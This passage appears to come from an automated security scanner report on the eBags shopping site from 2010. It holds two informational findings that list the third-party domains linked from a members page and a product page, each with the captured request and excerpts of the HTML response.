<div><a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com"><img width="65" height="37" border="0" src="//images.scanalert.com/meter/survey/www.ebags.com/63.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
...[SNIP]...

4.11. http://www.ebags.com/members/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/members/index.cfm

Issue detail

The page was loaded from a URL containing a query string:

http://www.ebags.com/members/index.cfm?fuseaction=welcome

The response contains the following links to other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif
http://ebags.liveclicker.com/
http://images.scanalert.com/meter/survey/www.ebags.com/63.gif
http://twitter.com/eBagsOnline
http://www.ebagscorporate.com/
http://www.facebook.com/eBags
http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com
https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com

Request

GET /members/index.cfm?fuseaction=welcome HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:02:57 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 14:02:57 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 45848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="icon" type="image/x-icon" />
<meta http-equiv="P3P" content='policyref="http://www.ebags.com/w3c/p3p.xml"'>
...[SNIP]...
<a href="http://www.ebags.com/">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif" border=0 alt=" HOME - luggage, handbags, backpacks, bags and travel accessories">
</a>
...[SNIP]...
<a href="#" class="helpLink"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif" alt="Need Help?" /></a>
...[SNIP]...
<a href="#" id="lnkDealOfDay" title="eBags Steal of the Day - one incredible deal, every day"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif" alt="Steal of the Day" border="0"></a>
...[SNIP]...
</a>
| <a href="http://ebags.liveclicker.com" class="headerLinkStyle" title="eBags Videos - View hundreds of helpful product videos">Video</a>
...[SNIP]...
<a href="#" onclick=" window.open('/blocks/dsp_non_discountable_brands.cfm','p2','height=750,width=300,scrollbars,resizable');return false" title="An extra 10%* off + Free Shipping Over $50"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif" width=960 height="40" border=0>
</a>
...[SNIP]...
<P>
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="20" height="10" align="left">
<table width="650" border="0" cellpadding="0">
...[SNIP]...
<li><a href="http://www.facebook.com/eBags" id="fb">Join Us on Facebook</a>
...[SNIP]...
<li><a href="http://twitter.com/eBagsOnline" id="twit">Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://www.ebagscorporate.com/">Corporate Sales</a>
...[SNIP]...
<div style="padding-top:10px;"><a href="http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com" target="_blank"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif" width="61" height="39" border="0" alt="Stella Service Elite" /></a>
...[SNIP]...
<a href="javascript:openSesame('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=www.ebags.com&lang=en','Security','no','500','450','no','yes','no','111','111')"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif" width="100" height="72" border="0"></a></div>
<div><a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com"><img width="65" height="37" border="0" src="//images.scanalert.com/meter/survey/www.ebags.com/63.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
...[SNIP]...

4.12. http://www.ebags.com/product/baggallini/a-la-carte-bagg-medium-crinkle-nylon/107617 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/product/baggallini/a-la-carte-bagg-medium-crinkle-nylon/107617

Issue detail

The page was loaded from a URL containing a query string:

http://www.ebags.com/product/baggallini/a-la-carte-bagg-medium-crinkle-nylon/107617?productid=1283460

The response contains the following links to other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_10_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_11_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_13_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_1_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_1_2?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=40&wid=40
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_1_3?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=40&wid=40
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_1_4?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=40&wid=40
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_1_5?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=40&wid=40
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_1_6?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=40&wid=40
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_2_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_3_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_4_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_7_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=280&wid=280
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_7_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dataTables.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.deviceBagFinder.min.js?ver=1
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.productDetail.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.validation.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/jquery.validate.min.js
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/btn-backtotop.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/btn-clicktozoom.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/btn-writeownreview.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/icon-botb.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/icon-home.png
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/icon-sendtoafriend.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpEmail.png
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpFAQ.png
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpPhone.png
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpSuggest.png
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/reponline.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logos/logo_376.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif
http://ebags.liveclicker.com/
http://images.scanalert.com/meter/survey/www.ebags.com/63.gif
http://twitter.com/eBagsOnline
http://www.ebagscorporate.com/
http://www.facebook.com/eBags
http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.ebags.com%2fproduct%2fbaggallini%2fa-la-carte-bagg-medium-crinkle-nylon%2f107617&layout=standard&show_faces=true&width=340&action=like&font=arial&colorscheme=light&height=80
http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com
https://sales.liveperson.net/hc/16136262/?cmd=file&file=visitorWantsToChat&site=16136262
https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Date: Sun, 26 Dec 2010 13:59:59 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
x-version: 10.05.0159.0000
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 13:59:59 GMT; path=/
Set-Cookie: ACCT=guest; path=/
Vary: Accept-Encoding
Content-Length: 87104

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="icon" type="image/x-icon" />
<meta http-equiv="P3P" content='policyref="http://www.ebags.com/w3c/p3p.xml"'>
...[SNIP]...
<a href="http://www.ebags.com/">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif" border=0 alt=" HOME - luggage, handbags, backpacks, bags and travel accessories">
</a>
...[SNIP]...
<a href="#" class="helpLink"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif" alt="Need Help?" /></a>
...[SNIP]...
<a href="#" id="lnkDealOfDay" title="eBags Steal of the Day - one incredible deal, every day"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif" alt="Steal of the Day" border="0"></a>
...[SNIP]...
</a>
| <a href="http://ebags.liveclicker.com" class="headerLinkStyle" title="eBags Videos - View hundreds of helpful product videos">Video</a>
...[SNIP]...
<a href="#" onclick=" window.open('/blocks/dsp_non_discountable_brands.cfm','p2','height=750,width=300,scrollbars,resizable');return false" title="An extra 10%* off + Free Shipping Over $50"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif" width=960 height="40" border=0>
</a>
...[SNIP]...
<a href="/"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/icon-home.png"></a>
...[SNIP]...
<a id="lnkZoomIcon" href="/products/view/ZoomColorsViews.cfm?fuseaction=imagePop&ModelID=107617&ipsid=107617_7_1" target="_blank"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/btn-clicktozoom.gif" border="0" /></a>
...[SNIP]...
<a href="/products/view/ZoomColorsViews.cfm?fuseaction=imagePop&ModelID=107617&ipsid=107617_7_1" target="_blank"
><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_7_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=280&wid=280" height="280" width="280" data-ipsid="107617_7_1" border="0" /></a>
</div>
<div class="md-pad10">
<img class="iconImage" src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_1_2?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=40&wid=40" data-ipsid="107617_1_2" />
<img class="iconImage" src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_1_3?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=40&wid=40" data-ipsid="107617_1_3" />
<img class="iconImage" src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_1_4?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=40&wid=40" data-ipsid="107617_1_4" />
<img class="iconImage" src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_1_5?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=40&wid=40" data-ipsid="107617_1_5" />
<img class="iconImage" src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_1_6?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=40&wid=40" data-ipsid="107617_1_6" />
</div>
...[SNIP]...
<a href="/brand/baggallini"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logos/logo_376.gif" /></a>
...[SNIP]...
<div class="productThumb"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_10_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55" alt="baggallini A La Carte Bagg - Medium - Crinkle Nylon Steel Blue/Leaf Green" height="55" width="55" class="iconImage skuImage" data-ipsid="107617_10_1" data-skuid="1283458"></div>
<div class="productThumb"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_4_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55" alt="baggallini A La Carte Bagg - Medium - Crinkle Nylon Khaki/Black" height="55" width="55" class="iconImage skuImage" data-ipsid="107617_4_1" data-skuid="1283455"></div>
<div class="productThumb"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_13_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55" alt="baggallini A La Carte Bagg - Medium - Crinkle Nylon Navy/Leaf Green" height="55" width="55" class="iconImage skuImage" data-ipsid="107617_13_1" data-skuid="10001422"></div>
<div class="productThumb"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_11_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55" alt="baggallini A La Carte Bagg - Medium - Crinkle Nylon Mushroom/Caspian Blue" height="55" width="55" class="iconImage skuImage" data-ipsid="107617_11_1" data-skuid="1330155"></div>
<div class="productThumb productThumb_select"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_7_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55" alt="baggallini A La Carte Bagg - Medium - Crinkle Nylon Tomato/Mango" height="55" width="55" class="iconImage skuImage" data-ipsid="107617_7_1" data-skuid="1283460"></div>
<div class="productThumb"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_1_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55" alt="baggallini A La Carte Bagg - Medium - Crinkle Nylon Black/Khaki" height="55" width="55" class="iconImage skuImage" data-ipsid="107617_1_1" data-skuid="1283452"></div>
<div class="productThumb"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_2_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55" alt="baggallini A La Carte Bagg - Medium - Crinkle Nylon Dark Olive/Spice" height="55" width="55" class="iconImage skuImage" data-ipsid="107617_2_1" data-skuid="1283453"></div>
<div class="productThumb"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_3_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55" alt="baggallini A La Carte Bagg - Medium - Crinkle Nylon Espresso/Tomato" height="55" width="55" class="iconImage skuImage" data-ipsid="107617_3_1" data-skuid="1283454"></div>
...[SNIP]...
<div class="icon-sendtoafriend"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/icon-sendtoafriend.gif" alt="Send to a Friend" /></div>
...[SNIP]...
<br />
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.ebags.com%2fproduct%2fbaggallini%2fa-la-carte-bagg-medium-crinkle-nylon%2f107617&layout=standard&show_faces=true&width=340&action=like&font=arial&colorscheme=light&height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:340px; height:25px;" allowTransparency="true"></iframe>
...[SNIP]...
<a href="#" onclick="javascript:openSesame('/info/index.cfm?FuseAction=BOTB','Info','no','300','250','no','no','no','111','111'); return false;"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/icon-botb.gif" /></a>
...[SNIP]...
</script>
<a id="_lpChatBtn" href='https://sales.liveperson.net/hc/16136262/?cmd=file&file=visitorWantsToChat&site=16136262'
target='chat16136262' onclick="javascript:window.open('https://sales.liveperson.net/hc/16136262/?cmd=file&file=visitorWantsToChat&site=16136262&referrer='+escape(document.location),'chat16136262','width=475,height=400,resizable=yes');return false;">
<span class="help-icon">
...[SNIP]...
<div id="lp-Ebags-WorldClassService-div">
<img src='http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/reponline.gif' name='' border="0" /></div>
...[SNIP]...
<span class="help-icon">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpPhone.png" width="70"
height="47" border="0" alt="Call Us 24/7" /></span>
...[SNIP]...
<span class="help-icon">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpEmail.png" width="70"
height="50" border="0" alt="Email" /></span>
...[SNIP]...
<span class="help-icon">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpFAQ.png" width="70" height="56"
border="0" alt="FAQ'S" /></span>
...[SNIP]...
<span class="help-icon">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpSuggest.png" width="70"
height="53" border="0" alt="Have a Suggestion?" /></span>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<a href="/info/ratings/index.cfm?fuseaction=enter&modelid=107617&testimonial_link=write_your_own"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/btn-writeownreview.gif" /></a>
...[SNIP]...
<a href="#"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/btn-backtotop.gif" width="96" height="22" alt="Back to top" /></a>
...[SNIP]...
<li><a href="http://www.facebook.com/eBags" id="fb">Join Us on Facebook</a>
...[SNIP]...
<li><a href="http://twitter.com/eBagsOnline" id="twit">Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://www.ebagscorporate.com/">Corporate Sales</a>
...[SNIP]...
<div style="padding-top:10px;"><a href="http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com" target="_blank"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif" width="61" height="39" border="0" alt="Stella Service Elite" /></a>
...[SNIP]...
<a href="javascript:openSesame('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=www.ebags.com&lang=en','Security','no','500','450','no','yes','no','111','111')"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif" width="100" height="72" border="0"></a></div>
<div><a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com"><img width="65" height="37" border="0" src="//images.scanalert.com/meter/survey/www.ebags.com/63.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
